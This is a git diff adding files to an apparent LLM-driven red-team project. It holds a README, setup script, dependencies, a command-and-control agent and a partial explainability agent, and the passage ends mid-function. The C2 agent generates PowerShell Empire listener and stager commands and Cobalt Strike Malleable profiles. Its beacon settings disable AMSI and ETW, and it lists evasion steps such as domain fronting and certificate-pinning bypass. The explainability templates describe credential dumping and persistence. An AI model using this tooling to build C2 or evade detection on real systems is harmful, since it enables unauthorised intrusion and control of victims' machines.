diff --git a/.env.template b/.env.template new file mode 100644 index 0000000000000000000000000000000000000000..07012a5b2816cfba9743b024e11932093bf12b7e --- /dev/null +++ b/.env.template @@ -0,0 +1,36 @@ +# Cyber-LLM Environment Configuration Template +# Copy this file to .env and fill in your actual values + +# Google Genkit Configuration +GEMINI_API_KEY=your_gemini_api_key_here +GENKIT_ENV=dev + +# Hugging Face Configuration +HF_TOKEN=your_hugging_face_token_here + +# OpenAI Configuration (if used) +OPENAI_API_KEY=your_openai_api_key_here + +# Azure Configuration (if used) +AZURE_OPENAI_API_KEY=your_azure_openai_api_key_here +AZURE_OPENAI_ENDPOINT=your_azure_endpoint_here + +# Database Configuration +DATABASE_URL=postgresql://user:password@localhost:5432/cyber_llm + +# Security Configuration +SECRET_KEY=your_secret_key_here +JWT_SECRET=your_jwt_secret_here + +# Monitoring Configuration +PROMETHEUS_PORT=9090 +GRAFANA_PORT=3000 + +# Application Configuration +PYTHONPATH=/home/o1/Desktop/cyber_llm/src +DEBUG=false +LOG_LEVEL=INFO + +# Development Configuration +DEV_MODE=false +TEST_MODE=false diff --git a/README.md b/README.md index 7e1ebd44eaa4d36660f5346863a3f088a2c9decd..e1fdf17dea9b5a9bd06bc02c61843985398bca5c 100644 --- a/README.md +++ b/README.md @@ -1,88 +1,92 @@ ---- -title: Cyber-LLM Research Platform -emoji: ๐Ÿ›ก๏ธ -colorFrom: green -colorTo: blue -sdk: docker -pinned: false -license: mit -short_description: Cybersecurity AI Research Platform with HF Models ---- - -# ๐Ÿ›ก๏ธ Cyber-LLM Research Platform - -Advanced Cybersecurity AI Research Environment for threat analysis, vulnerability detection, and security intelligence using Hugging Face models. 
- -## ๐Ÿš€ Features +# ๐Ÿ›ก๏ธ Cyber-LLM: Advanced Cybersecurity AI Research Platform -- **Advanced Threat Analysis**: Multi-model AI analysis for cybersecurity threats -- **Code Vulnerability Detection**: Automated security code review and analysis -- **Multi-Agent Research**: Distributed cybersecurity AI agent coordination -- **Real-time Processing**: Live threat intelligence and incident response -- **Interactive Dashboard**: Web-based research interface for security professionals +**โšก Live Demo:** [https://huggingface.co/spaces/unit731/cyber_llm](https://huggingface.co/spaces/unit731/cyber_llm) -## ๐Ÿ”ง API Endpoints +## ๐ŸŽฏ Vision +Cyber-LLM empowers security professionals by synthesizing advanced adversarial tradecraft, OPSEC-aware reasoning, and automated attack-chain orchestration. From initial reconnaissance through post-exploitation and exfiltration, Cyber-LLM acts as a strategic partner in red-team simulations and adversarial research. -- `GET /` - Main platform dashboard -- `POST /analyze_threat` - Comprehensive threat analysis -- `GET /models` - List available cybersecurity models -- `GET /research` - Interactive research dashboard -- `POST /analyze_file` - Security file analysis -- `GET /health` - Platform health check +## ๐Ÿš€ Key Innovations +1. **Adversarial Fine-Tuning**: Self-play loops generate adversarial prompts to harden model robustness. +2. **Explainability & Safety Agents**: Modules providing rationales for each decision and checking for OPSEC breaches. +3. **Data Versioning & MLOps**: Integrated DVC, MLflow, and Weights & Biases for reproducible pipelines. +4. **Dynamic Memory Bank**: Embedding-based persona memory for historical APT tactics retrieval. +5. **Hybrid Reasoning**: Combines neural LLM with symbolic rule-engine for exploit chain logic. -## ๐Ÿค– Available Models +## ๐Ÿ—๏ธ Detailed Architecture +- **Base Model**: Choice of LLaMA-3 / Phi-3 trunk with 7Bโ€“33B parameters. 
+- **LoRA Adapters**: Specialized modules for Recon, C2, Post-Exploit, Explainability, Safety. +- **Memory Store**: Vector DB (e.g., FAISS or Milvus) for persona & case retrieval. +- **Orchestrator**: LangChain + YAML-defined workflows under `src/orchestration/`. +- **MLOps Stack**: DVC-managed datasets, MLflow tracking, W&B dashboards, Grafana monitoring. -- **microsoft/codebert-base** - Code analysis and vulnerability detection -- **huggingface/CodeBERTa-small-v1** - Lightweight code understanding -- **Custom Security Models** - Specialized cybersecurity AI models - -## ๐Ÿ’ป Usage - -### Quick Threat Analysis +## ๐Ÿ’ป Usage Examples ```bash -curl -X POST "https://unit731-cyber-llm.hf.space/analyze_threat" \ - -H "Content-Type: application/json" \ - -d '{ - "threat_data": "suspicious network activity detected on port 443", - "analysis_type": "comprehensive" - }' +# Preprocess data +dvc repro src/data/preprocess.py +# Train adapters +python src/training/train.py --module ReconOps +# Run a red-team scenario +python src/deployment/cli/cyber_cli.py orchestrate recon,target=10.0.0.5 ``` -### Interactive Research -Visit the `/research` endpoint for a web-based cybersecurity research dashboard. 
- -## ๐Ÿ”ฌ Research Applications +## ๐Ÿš€ Packaging & Deployment -- **Threat Intelligence**: Advanced AI-powered threat analysis and classification -- **Vulnerability Research**: Automated discovery and analysis of security vulnerabilities -- **Incident Response**: AI-assisted cybersecurity incident investigation and response -- **Security Code Review**: Automated security analysis of source code and configurations -- **Penetration Testing**: AI-enhanced security testing and red team operations +### โ˜๏ธ **Live Hugging Face Space** +Experience the platform instantly at [unit731/cyber_llm](https://huggingface.co/spaces/unit731/cyber_llm) +- ๐ŸŒ **Web Dashboard**: Interactive cybersecurity research interface +- ๐Ÿ“Š **Real-time Analysis**: Live threat analysis and monitoring +- ๐Ÿ” **API Access**: RESTful API for integration +- ๐Ÿ“š **Documentation**: Complete API docs at `/docs` -## ๐Ÿ› ๏ธ Development +### ๐Ÿณ **Docker Deployment** -This platform is built using: -- **FastAPI** - High-performance web API framework -- **Hugging Face Transformers** - State-of-the-art AI model integration -- **Docker** - Containerized deployment for scalability -- **Python 3.9** - Modern Python runtime environment +1. **Docker**: `docker-compose up --build` for offline labs. +2. **Kubernetes**: `kubectl apply -f src/deployment/k8s/` for scalable clusters. +3. 
**CLI**: `cyber-llm agent recon --target 10.0.0.5` -## ๐Ÿ” Security Focus +## ๐Ÿ‘จโ€๐Ÿ’ป Author: Muzan Sano +## ๐Ÿ“ง Contact: sanosensei36@gmail.com / research.unit734@proton.me -This research platform is designed specifically for cybersecurity applications: - -- **Ethical Research**: All capabilities designed for defensive security research -- **Professional Use**: Intended for security professionals and researchers -- **Educational Purpose**: Advancing cybersecurity through AI research -- **Open Source**: Transparent and community-driven development +--- -## ๐ŸŒ Links +## ๐ŸŒŸ **PROJECT STATUS & CAPABILITIES** + +### โœ… **Currently Implemented** +- ๐Ÿš€ **Live Hugging Face Space** with interactive web interface +- ๐Ÿ›ก๏ธ **Advanced Threat Analysis** using AI models +- ๐Ÿค– **Multi-Agent Architecture** for distributed security operations +- ๐Ÿง  **Cognitive AI Systems** with memory and learning capabilities +- ๐Ÿ“Š **Real-time Monitoring** and alerting systems +- ๐Ÿ” **Code Vulnerability Detection** and security analysis +- ๐Ÿณ **Enterprise Docker Deployment** with Kubernetes support +- ๐Ÿ” **Zero Trust Security Architecture** and RBAC +- ๐Ÿ“ˆ **MLOps Pipeline** with DVC, MLflow, and monitoring + +### ๐ŸŽฏ **Key Features Available** +- **Interactive Web Dashboard**: Research interface at `/research` endpoint +- **RESTful API**: Complete API at `/docs` with real-time threat analysis +- **File Analysis**: Upload and analyze security files for vulnerabilities +- **Multi-Model Support**: Integration with Hugging Face transformer models +- **Real-time Processing**: WebSocket support for live monitoring +- **Enterprise Architecture**: Scalable, production-ready deployment + +### ๐Ÿš€ **Try It Now** +```bash +# Quick API test +curl -X POST "https://unit731-cyber-llm.hf.space/analyze_threat" \ + -H "Content-Type: application/json" \ + -d '{"threat_data": "suspicious network activity on port 443"}' -- **GitHub Repository**: 
[734ai/cyber-llm](https://github.com/734ai/cyber-llm) -- **Hugging Face Space**: [unit731/cyber_llm](https://huggingface.co/spaces/unit731/cyber_llm) -- **Documentation**: Available at `/docs` endpoint -- **Research Dashboard**: Available at `/research` endpoint +# Or visit the interactive dashboard +# https://unit731-cyber-llm.hf.space/research +``` ---- +### ๐Ÿ”ง **Local Development** +```bash +git clone https://github.com/734ai/cyber-llm.git +cd cyber-llm +cp .env.template .env # Configure your API keys +docker-compose up -d # Start full platform +``` -**๐Ÿ”ฌ Advancing Cybersecurity Through AI Research** +**๐ŸŒ Experience Live Demo:** [https://huggingface.co/spaces/unit731/cyber_llm](https://huggingface.co/spaces/unit731/cyber_llm) diff --git a/requirements.txt b/requirements.txt index c2a4b606dcd1cd28a6b2bc96f923467a854a0c51..ecf473996dfabffe05ec4eaae51368d0f4347b16 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,8 +1,60 @@ +# Core Modeling & PEFT +transformers>=4.33.0 +peft>=0.4.0 +trl>=0.4.0 +accelerate>=0.20.0 +langchain>=0.0.300 + +# Deep Learning +torch>=2.0.0 +sentencepiece + +# Data & Versioning +datasets +dvc>=2.0.0 +mlflow +wandb + +# PDF, OCR & Embedding +pdfminer.six +pypdf2 +faiss-cpu +numpy +scikit-learn + +# Agents, Orchestration & CLI fastapi -uvicorn[standard] -transformers -huggingface_hub +uvicorn pydantic -python-multipart -torch -datasets +pyyaml +requests +click + +# Security & Testing +bandit +trivy +pytest +pytest-cov +safety + +# Deployment & Infrastructure +docker +kubernetes +helm +helmfile +terraform + +# Monitoring & Logging +prometheus-client +grafana-api-client +slack-sdk + +# Utilities +python-dotenv +loguru + +# Google Genkit Integration +genkit>=0.5.0 +genkit-plugin-google-genai>=0.1.0 +genkit-plugin-dev-local-vectorstore>=0.1.0 +pydantic>=2.0.0 diff --git a/setup.sh b/setup.sh new file mode 100644 index 0000000000000000000000000000000000000000..7d6225b77c3716d686e76b3c3fc4076849130188 --- /dev/null +++ b/setup.sh @@ 
-0,0 +1,131 @@ +#!/bin/bash +# Cyber-LLM Project Setup Script +# Author: Muzan Sano +# Email: sanosensei36@gmail.com + +set -e + +echo "๐Ÿš€ Setting up Cyber-LLM project..." + +# Check Python version +python_version=$(python3 --version 2>&1 | cut -d' ' -f2) +echo "๐Ÿ“‹ Python version: $python_version" + +# Create virtual environment if it doesn't exist +if [ ! -d "venv" ]; then + echo "๐Ÿ“ฆ Creating virtual environment..." + python3 -m venv venv +fi + +# Activate virtual environment +echo "๐Ÿ”„ Activating virtual environment..." +source venv/bin/activate + +# Upgrade pip +echo "โฌ†๏ธ Upgrading pip..." +pip install --upgrade pip + +# Install requirements +echo "๐Ÿ“š Installing requirements..." +pip install -r requirements.txt + +# Create necessary directories +echo "๐Ÿ“ Creating project directories..." +mkdir -p logs +mkdir -p outputs +mkdir -p models +chmod +x src/deployment/cli/cyber_cli.py + +# Set up DVC (if available) +if command -v dvc &> /dev/null; then + echo "๐Ÿ“Š Initializing DVC..." + dvc init --no-scm 2>/dev/null || echo "DVC already initialized" +fi + +# Set up pre-commit hooks (if available) +if command -v pre-commit &> /dev/null; then + echo "๐Ÿ”ง Setting up pre-commit hooks..." + pre-commit install 2>/dev/null || echo "Pre-commit hooks setup skipped" +fi + +# Download sample data (placeholder) +echo "๐Ÿ“ฅ Setting up sample data..." +mkdir -p src/data/raw/samples +echo "Sample cybersecurity dataset placeholder" > src/data/raw/samples/sample.txt + +# Create initial configuration files +echo "โš™๏ธ Creating configuration files..." 
+cat > configs/training_config.yaml << 'EOF' +# Training Configuration for Cyber-LLM +model: + base_model: "microsoft/Phi-3-mini-4k-instruct" + max_length: 2048 + +lora: + r: 16 + lora_alpha: 32 + lora_dropout: 0.1 + +training: + batch_size: 4 + learning_rate: 2e-4 + num_epochs: 3 + +mlops: + use_wandb: false + use_mlflow: false + experiment_name: "cyber-llm-local" +EOF + +# Run initial tests +echo "๐Ÿงช Running initial tests..." +python -c " +import sys +print('โœ… Python import test passed') + +try: + import torch + print(f'โœ… PyTorch {torch.__version__} available') + print(f' CUDA available: {torch.cuda.is_available()}') +except ImportError: + print('โš ๏ธ PyTorch not available - install manually if needed') + +try: + import transformers + print(f'โœ… Transformers {transformers.__version__} available') +except ImportError: + print('โš ๏ธ Transformers not available - install manually if needed') +" + +# Create sample workflow +echo "๐Ÿ“‹ Creating sample workflow files..." +mkdir -p src/orchestration/workflows +cat > src/orchestration/workflows/basic_red_team.yaml << 'EOF' +name: "Basic Red Team Assessment" +description: "Standard red team workflow" +phases: + - name: "reconnaissance" + agents: ["recon"] + parallel: false + safety_check: true + human_approval: true + - name: "initial_access" + agents: ["c2"] + parallel: false + safety_check: true + human_approval: true + depends_on: ["reconnaissance"] +EOF + +echo "" +echo "โœ… Cyber-LLM setup completed successfully!" +echo "" +echo "๐Ÿ“– Next steps:" +echo " 1. Activate virtual environment: source venv/bin/activate" +echo " 2. Run CLI: python src/deployment/cli/cyber_cli.py --help" +echo " 3. Train adapters: python src/training/train.py --help" +echo " 4. Check README.md for detailed instructions" +echo "" +echo "๐Ÿ” For red team operations, ensure you have proper authorization!" +echo "๐Ÿ“ง Questions? 
Contact: sanosensei36@gmail.com" +echo "" diff --git a/src/agents/c2_agent.py b/src/agents/c2_agent.py new file mode 100644 index 0000000000000000000000000000000000000000..41d9452cfbeed0dfc5e3053d08c06da4d900c93f --- /dev/null +++ b/src/agents/c2_agent.py @@ -0,0 +1,448 @@ +""" +Cyber-LLM C2 Agent + +Command and Control (C2) configuration and management agent. +Handles Empire, Cobalt Strike, and custom C2 framework integration. + +Author: Muzan Sano +Email: sanosensei36@gmail.com +""" + +import json +import logging +import random +import time +from typing import Dict, List, Any, Optional +from dataclasses import dataclass +from pydantic import BaseModel +import yaml +from datetime import datetime, timedelta + +# Configure logging +logging.basicConfig(level=logging.INFO) +logger = logging.getLogger(__name__) + +class C2Request(BaseModel): + payload_type: str + target_environment: str + network_constraints: Dict[str, Any] + stealth_level: str = "high" + duration: int = 3600 # seconds + +class C2Response(BaseModel): + c2_profile: Dict[str, Any] + beacon_config: Dict[str, Any] + empire_commands: List[str] + cobalt_strike_config: Dict[str, Any] + opsec_mitigations: List[str] + monitoring_setup: Dict[str, Any] + +class C2Agent: + """ + Advanced Command and Control agent for red team operations. + Manages C2 infrastructure, beacon configuration, and OPSEC. 
+ """ + + def __init__(self, config_path: Optional[str] = None): + self.config = self._load_config(config_path) + self.c2_profiles = self._load_c2_profiles() + self.opsec_rules = self._load_opsec_rules() + + def _load_config(self, config_path: Optional[str]) -> Dict[str, Any]: + """Load C2 configuration from YAML file.""" + if config_path: + with open(config_path, 'r') as f: + return yaml.safe_load(f) + return { + "default_jitter": "20%", + "default_sleep": 60, + "max_beacon_life": 86400, + "kill_date_offset": 7 # days + } + + def _load_c2_profiles(self) -> Dict[str, Any]: + """Load C2 communication profiles.""" + return { + "http_get": { + "name": "HTTP GET Profile", + "protocol": "http", + "method": "GET", + "uri": ["/api/v1/status", "/health", "/metrics", "/ping"], + "headers": { + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + }, + "detection_risk": "low" + }, + "http_post": { + "name": "HTTP POST Profile", + "protocol": "http", + "method": "POST", + "uri": ["/api/v1/upload", "/submit", "/contact", "/feedback"], + "headers": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "detection_risk": "medium" + }, + "dns_tunnel": { + "name": "DNS Tunneling Profile", + "protocol": "dns", + "subdomain_prefix": ["api", "cdn", "mail", "ftp"], + "detection_risk": "low", + "bandwidth": "limited" + }, + "https_cert": { + "name": "HTTPS with Valid Certificate", + "protocol": "https", + "cert_required": True, + "detection_risk": "very_low", + "setup_complexity": "high" + } + } + + def _load_opsec_rules(self) -> Dict[str, Any]: + """Load OPSEC rules and guidelines.""" + return { + "timing": { + "min_sleep": 30, + "max_sleep": 300, + "jitter_range": [10, 50], + "burst_limit": 5 + }, + "infrastructure": { + "domain_age_min": 30, # days + "ssl_cert_required": True, + "cdn_recommended": True + }, + "operational": { + "kill_date_max": 30, # days + 
"beacon_rotation": True, + "payload_obfuscation": True + } + } + + def select_c2_profile(self, environment: str, constraints: Dict[str, Any]) -> Dict[str, Any]: + """ + Select optimal C2 profile based on target environment and constraints. + + # HUMAN_APPROVAL_REQUIRED: Review C2 profile selection for operational security + """ + # Analyze network constraints + blocked_ports = constraints.get("blocked_ports", []) + proxy_present = constraints.get("proxy", False) + ssl_inspection = constraints.get("ssl_inspection", False) + + # Score profiles based on constraints + profile_scores = {} + + for profile_name, profile in self.c2_profiles.items(): + score = 100 # Base score + + # Adjust for blocked ports + if profile["protocol"] == "http" and 80 in blocked_ports: + score -= 50 + elif profile["protocol"] == "https" and 443 in blocked_ports: + score -= 50 + elif profile["protocol"] == "dns" and 53 in blocked_ports: + score -= 80 + + # Adjust for SSL inspection + if ssl_inspection and profile["protocol"] == "https": + score -= 30 + + # Adjust for proxy + if proxy_present and profile["protocol"] in ["http", "https"]: + score += 20 # Proxy can help blend traffic + + # Consider detection risk + risk_penalties = { + "very_low": 0, + "low": -5, + "medium": -15, + "high": -30 + } + score += risk_penalties.get(profile.get("detection_risk", "medium"), -15) + + profile_scores[profile_name] = score + + # Select best profile + best_profile = max(profile_scores, key=profile_scores.get) + selected_profile = self.c2_profiles[best_profile].copy() + selected_profile["selection_score"] = profile_scores[best_profile] + selected_profile["selection_reason"] = f"Best fit for {environment} environment" + + logger.info(f"Selected C2 profile: {best_profile} (score: {profile_scores[best_profile]})") + return selected_profile + + def configure_beacon(self, profile: Dict[str, Any], stealth_level: str) -> Dict[str, Any]: + """Configure beacon parameters based on profile and stealth requirements.""" + 
# Base configuration + base_sleep = self.config.get("default_sleep", 60) + jitter = self.config.get("default_jitter", "20%") + + # Adjust for stealth level + stealth_multipliers = { + "low": {"sleep": 0.5, "jitter": 10}, + "medium": {"sleep": 1.0, "jitter": 20}, + "high": {"sleep": 2.0, "jitter": 30}, + "maximum": {"sleep": 5.0, "jitter": 50} + } + + multiplier = stealth_multipliers.get(stealth_level, stealth_multipliers["medium"]) + + beacon_config = { + "sleep_time": int(base_sleep * multiplier["sleep"]), + "jitter": f"{multiplier['jitter']}%", + "max_dns_requests": 5, + "user_agent": profile.get("headers", {}).get("User-Agent", ""), + "kill_date": (datetime.now() + timedelta(days=self.config.get("kill_date_offset", 7))).isoformat(), + "spawn_to": "C:\\Windows\\System32\\rundll32.exe", + "post_ex": { + "amsi_disable": True, + "etw_disable": True, + "spawnto_x86": "C:\\Windows\\SysWOW64\\rundll32.exe", + "spawnto_x64": "C:\\Windows\\System32\\rundll32.exe" + } + } + + # Add protocol-specific configuration + if profile["protocol"] == "dns": + beacon_config.update({ + "dns_idle": "8.8.8.8", + "dns_max_txt": 252, + "dns_ttl": 1 + }) + elif profile["protocol"] in ["http", "https"]: + beacon_config.update({ + "uri": random.choice(profile.get("uri", ["/"])), + "headers": profile.get("headers", {}) + }) + + return beacon_config + + def generate_empire_commands(self, profile: Dict[str, Any], beacon_config: Dict[str, Any]) -> List[str]: + """Generate PowerShell Empire commands for C2 setup.""" + commands = [ + "# PowerShell Empire C2 Setup", + "use listener/http", + f"set Name {profile.get('name', 'http_listener')}", + f"set Host {profile.get('host', '0.0.0.0')}", + f"set Port {profile.get('port', 80)}", + f"set DefaultJitter {beacon_config['jitter']}", + f"set DefaultDelay {beacon_config['sleep_time']}", + "execute", + "", + "# Generate stager", + "use stager/multi/launcher", + f"set Listener {profile.get('name', 'http_listener')}", + "set OutFile /tmp/launcher.ps1", + 
"execute" + ] + + return commands + + def generate_cobalt_strike_config(self, profile: Dict[str, Any], beacon_config: Dict[str, Any]) -> Dict[str, Any]: + """Generate Cobalt Strike Malleable C2 profile configuration.""" + cs_config = { + "global": { + "jitter": beacon_config["jitter"], + "sleeptime": beacon_config["sleep_time"], + "useragent": beacon_config.get("user_agent", "Mozilla/5.0"), + "sample_name": "Cyber-LLM C2", + }, + "http-get": { + "uri": profile.get("uri", ["/"])[0], + "client": { + "header": profile.get("headers", {}), + "metadata": { + "base64url": True, + "parameter": "session" + } + }, + "server": { + "header": { + "Server": "nginx/1.18.0", + "Cache-Control": "max-age=0, no-cache", + "Connection": "keep-alive" + }, + "output": { + "base64": True, + "print": True + } + } + }, + "http-post": { + "uri": "/api/v1/submit", + "client": { + "header": { + "Content-Type": "application/x-www-form-urlencoded" + }, + "id": { + "parameter": "id" + }, + "output": { + "parameter": "data" + } + }, + "server": { + "header": { + "Server": "nginx/1.18.0" + }, + "output": { + "base64": True, + "print": True + } + } + } + } + + return cs_config + + def assess_opsec_compliance(self, config: Dict[str, Any]) -> List[str]: + """Assess OPSEC compliance and generate mitigation recommendations.""" + mitigations = [] + + # Check sleep time + if config.get("sleep_time", 0) < self.opsec_rules["timing"]["min_sleep"]: + mitigations.append("Increase sleep time to reduce detection risk") + + # Check jitter + jitter_val = int(config.get("jitter", "0%").replace("%", "")) + if jitter_val < self.opsec_rules["timing"]["jitter_range"][0]: + mitigations.append("Increase jitter to add timing randomization") + + # Check kill date + if "kill_date" not in config: + mitigations.append("Set kill date to prevent indefinite operation") + + # Infrastructure checks + mitigations.extend([ + "Use domain fronting or CDN for traffic obfuscation", + "Implement certificate pinning bypass techniques", + 
"Rotate C2 infrastructure regularly", + "Monitor for blue team detection signatures" + ]) + + return mitigations + + def setup_monitoring(self, profile: Dict[str, Any]) -> Dict[str, Any]: + """Setup monitoring and logging for C2 operations.""" + monitoring_config = { + "beacon_logging": { + "enabled": True, + "log_level": "INFO", + "log_file": f"/var/log/c2/{profile.get('name', 'default')}.log" + }, + "health_checks": { + "interval": 300, # seconds + "endpoints": [ + f"http://localhost/health", + f"http://localhost/api/status" + ] + }, + "alerting": { + "enabled": True, + "channels": ["slack", "email"], + "triggers": { + "beacon_death": True, + "detection_signature": True, + "infrastructure_compromise": True + } + }, + "metrics": { + "active_beacons": 0, + "successful_callbacks": 0, + "failed_callbacks": 0, + "data_exfiltrated": "0 MB" + } + } + + return monitoring_config + + def execute_c2_setup(self, request: C2Request) -> C2Response: + """ + Execute complete C2 setup workflow. + + # HUMAN_APPROVAL_REQUIRED: Review C2 configuration before deployment + """ + logger.info(f"Setting up C2 for payload type: {request.payload_type}") + + # Select optimal C2 profile + profile = self.select_c2_profile(request.target_environment, request.network_constraints) + + # Configure beacon + beacon_config = self.configure_beacon(profile, request.stealth_level) + + # Generate framework-specific configurations + empire_commands = self.generate_empire_commands(profile, beacon_config) + cs_config = self.generate_cobalt_strike_config(profile, beacon_config) + + # OPSEC assessment + opsec_mitigations = self.assess_opsec_compliance(beacon_config) + + # Setup monitoring + monitoring_setup = self.setup_monitoring(profile) + + response = C2Response( + c2_profile=profile, + beacon_config=beacon_config, + empire_commands=empire_commands, + cobalt_strike_config=cs_config, + opsec_mitigations=opsec_mitigations, + monitoring_setup=monitoring_setup + ) + + logger.info(f"C2 setup complete for 
{request.target_environment}") + return response + +def main(): + """CLI interface for C2Agent.""" + import argparse + + parser = argparse.ArgumentParser(description="Cyber-LLM C2 Agent") + parser.add_argument("--payload-type", required=True, help="Type of payload (powershell, executable, dll)") + parser.add_argument("--environment", required=True, help="Target environment description") + parser.add_argument("--stealth", choices=["low", "medium", "high", "maximum"], + default="high", help="Stealth level") + parser.add_argument("--config", help="Path to configuration file") + parser.add_argument("--output", help="Output file for results") + + args = parser.parse_args() + + # Initialize agent + agent = C2Agent(config_path=args.config) + + # Create request (simplified for CLI) + request = C2Request( + payload_type=args.payload_type, + target_environment=args.environment, + network_constraints={ + "blocked_ports": [22, 23], + "proxy": True, + "ssl_inspection": False + }, + stealth_level=args.stealth + ) + + # Execute C2 setup + response = agent.execute_c2_setup(request) + + # Output results + result = { + "c2_profile": response.c2_profile, + "beacon_config": response.beacon_config, + "empire_commands": response.empire_commands, + "cobalt_strike_config": response.cobalt_strike_config, + "opsec_mitigations": response.opsec_mitigations, + "monitoring_setup": response.monitoring_setup + } + + if args.output: + with open(args.output, 'w') as f: + json.dump(result, f, indent=2) + print(f"C2 configuration saved to {args.output}") + else: + print(json.dumps(result, indent=2)) + +if __name__ == "__main__": + main() diff --git a/src/agents/explainability_agent.py b/src/agents/explainability_agent.py new file mode 100644 index 0000000000000000000000000000000000000000..445590f85084a25a63bdc80164893291abaa49a3 --- /dev/null +++ b/src/agents/explainability_agent.py @@ -0,0 +1,341 @@ +""" +Explainability Agent for Cyber-LLM +Provides rationale and explanation for agent decisions +""" 
+ +import json +import logging +from typing import Dict, List, Any, Optional +from datetime import datetime +import yaml + +# Configure logging +logging.basicConfig(level=logging.INFO) +logger = logging.getLogger(__name__) + +class ExplainabilityAgent: + """ + Agent responsible for providing explainable rationales for decisions + made by other agents in the Cyber-LLM system. + """ + + def __init__(self, config_path: Optional[str] = None): + """Initialize the ExplainabilityAgent""" + self.config = self._load_config(config_path) + self.explanation_templates = self._load_explanation_templates() + + def _load_config(self, config_path: Optional[str]) -> Dict[str, Any]: + """Load configuration for the explainability agent""" + default_config = { + "explanation_depth": "detailed", # basic, detailed, comprehensive + "include_risks": True, + "include_mitigations": True, + "include_alternatives": True, + "format": "json" # json, markdown, yaml + } + + if config_path: + try: + with open(config_path, 'r') as f: + user_config = yaml.safe_load(f) + default_config.update(user_config) + except Exception as e: + logger.warning(f"Could not load config from {config_path}: {e}") + + return default_config + + def _load_explanation_templates(self) -> Dict[str, str]: + """Load explanation templates for different agent types""" + return { + "recon": """ + RECONNAISSANCE DECISION EXPLANATION: + Action: {action} + Target: {target} + + Justification: + - {justification} + + Risk Assessment: + - Detection Risk: {detection_risk} + - Network Impact: {network_impact} + - Time Investment: {time_investment} + + OPSEC Considerations: + - {opsec_considerations} + + Alternative Approaches: + - {alternatives} + """, + + "c2": """ + C2 CHANNEL DECISION EXPLANATION: + Channel Type: {channel_type} + Configuration: {configuration} + + Justification: + - {justification} + + Risk Assessment: + - Stealth Level: {stealth_level} + - Reliability: {reliability} + - Bandwidth: {bandwidth} + + OPSEC 
Considerations:
    - {opsec_considerations}

    Backup Options:
    - {backup_options}
    """,

            # Template for post-exploitation decisions; placeholders are
            # str.format-style keys filled in by the reporting caller.
            "post_exploit": """
    POST-EXPLOITATION DECISION EXPLANATION:
    Action: {action}
    Method: {method}

    Justification:
    - {justification}

    Risk Assessment:
    - Detection Probability: {detection_probability}
    - System Impact: {system_impact}
    - Evidence Left: {evidence_left}

    OPSEC Considerations:
    - {opsec_considerations}

    Cleanup Required:
    - {cleanup_required}
    """
        }

    def explain_decision(self, agent_type: str, decision_data: Dict[str, Any]) -> Dict[str, Any]:
        """
        Generate an explanation for an agent's decision.

        Args:
            agent_type: Type of agent (recon, c2, post_exploit, etc.)
            decision_data: Data about the decision made

        Returns:
            Dictionary containing the detailed explanation.  On any internal
            failure a dictionary with an "error" key is returned instead of
            raising, so callers always receive a dict.
        """
        try:
            explanation = {
                "timestamp": datetime.now().isoformat(),
                "agent_type": agent_type,
                "decision_id": decision_data.get("id", "unknown"),
                "explanation": self._generate_explanation(agent_type, decision_data),
                "risk_assessment": self._assess_risks(agent_type, decision_data),
                "alternatives": self._suggest_alternatives(agent_type, decision_data),
                "confidence_score": self._calculate_confidence(decision_data)
            }

            # Mitigations are optional and controlled by configuration
            # (defaults to on when the key is absent).
            if self.config.get("include_mitigations", True):
                explanation["mitigations"] = self._suggest_mitigations(agent_type, decision_data)

            logger.info(f"Generated explanation for {agent_type} decision: {decision_data.get('id', 'unknown')}")
            return explanation

        except Exception as e:
            logger.error(f"Error generating explanation: {e}")
            return {
                "error": f"Failed to generate explanation: {str(e)}",
                "timestamp": datetime.now().isoformat(),
                "agent_type": agent_type
            }

    def _generate_explanation(self, agent_type: str, decision_data: Dict[str, Any]) -> str:
        """Generate the core explanation text, dispatching on agent type."""
        if agent_type == "recon":
            return self._explain_recon_decision(decision_data)
        elif agent_type == "c2":
            return self._explain_c2_decision(decision_data)
        elif agent_type == "post_exploit":
            return self._explain_post_exploit_decision(decision_data)
        else:
            # Unknown agent types fall back to a generic one-liner.
            return f"Decision made by {agent_type} agent based on available information."

    def _explain_recon_decision(self, decision_data: Dict[str, Any]) -> str:
        """Explain reconnaissance decisions (canned text keyed by action)."""
        action = decision_data.get("action", "unknown")
        target = decision_data.get("target", "unknown")

        explanations = {
            "nmap_scan": f"Initiated Nmap scan against {target} to identify open ports and services. This is a standard reconnaissance technique that provides essential information for attack planning.",
            "shodan_search": f"Performed Shodan search for {target} to gather passive intelligence about exposed services without direct interaction with the target.",
            "dns_enum": f"Conducted DNS enumeration for {target} to map the network infrastructure and identify potential attack vectors."
        }

        return explanations.get(action, f"Performed {action} against {target} as part of reconnaissance phase.")

    def _explain_c2_decision(self, decision_data: Dict[str, Any]) -> str:
        """Explain C2 channel decisions (canned text keyed by channel type)."""
        channel = decision_data.get("channel_type", "unknown")

        explanations = {
            "http": "Selected HTTP channel for C2 communication due to its ability to blend with normal web traffic and bypass many network filters.",
            "https": "Chose HTTPS channel for encrypted C2 communication, providing both stealth and security for command transmission.",
            "dns": "Implemented DNS tunneling for C2 to leverage a protocol that is rarely blocked and often unmonitored."
        }

        return explanations.get(channel, f"Established {channel} C2 channel based on network constraints and stealth requirements.")

    def _explain_post_exploit_decision(self, decision_data: Dict[str, Any]) -> str:
        """Explain post-exploitation decisions (canned text keyed by action)."""
        action = decision_data.get("action", "unknown")

        explanations = {
            "credential_dump": "Initiated credential dumping to harvest authentication materials for lateral movement and privilege escalation.",
            "lateral_movement": "Attempting lateral movement to expand access within the target network and reach high-value assets.",
            "persistence": "Establishing persistence mechanisms to maintain access even after system reboots or security updates."
        }

        return explanations.get(action, f"Executed {action} to advance the attack chain and achieve mission objectives.")

    def _assess_risks(self, agent_type: str, decision_data: Dict[str, Any]) -> Dict[str, str]:
        """
        Assess risks associated with the decision.

        Returns a dict of four qualitative risk factors.  Baseline values are
        adjusted upward for recon actions containing "aggressive"/"fast" and
        post-exploit actions containing "dump"/"extract".
        """
        risk_factors = {
            "detection_risk": "medium",
            "system_impact": "low",
            "evidence_trail": "minimal",
            "network_noise": "low"
        }

        # Adjust risk factors based on agent type and action
        if agent_type == "recon":
            action = decision_data.get("action", "")
            if "aggressive" in action.lower() or "fast" in action.lower():
